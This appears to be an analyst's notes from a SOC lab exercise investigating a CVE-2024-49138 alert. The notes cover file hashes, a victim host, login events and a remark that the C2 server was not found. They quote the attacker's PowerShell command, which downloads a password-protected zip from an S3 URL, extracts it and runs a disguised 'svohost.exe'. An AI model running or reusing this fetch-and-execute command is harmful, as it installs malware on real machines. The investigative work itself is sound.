File Hash: b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9 cve-2024-49138 File Hash 2: 6335b893875cc9e61cf499cfc6ab06c17caf11e8a806d2f0358f7f35c9beacd5 Host: 172.16.17.207 (Victor) command line execution: ``` $url = 'https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip'; $dest = 'C:\temp\service-installer.zip'; $extractPath = 'C:\temp'; $password = 'infected'; if (-not (Test-Path -Path $extractPath)) { New-Item -ItemType Directory -Path $extractPath -Force | Out-Null }; Invoke-WebRequest -Uri $url -OutFile $dest; $7zipPath = 'C:\Program Files\7-Zip\7z.exe'; Start-Process -FilePath $7zipPath -ArgumentList "x -p$password -o$extractPath $dest" -NoNewWindow -Wait -PassThru; Remove-Item -Path $dest; Start-Process -FilePath "$extractPath\service_installer\svohost.exe" ``` attempted privilege escalation: ``` "C:\Windows\system32\whoami.exe" /priv ``` Log Management: source_address 185.107.56.141 makes 5 connections before starting to login as admin, failing twice, and then succeeding logging in as Victor within a minute at Jan 22, 2:35pm EventID4624 remote account was logged on EventID4625 failure for guest No indication that malware was quarantined I couldn't find a sample of the malware to verify the C2 address dynamically, but checking endpoint security and log management shows that the malware has been downloaded from an aws filehosting site. The community walkthrough posted by LetsDefend doesn't show how to find the C2 server either.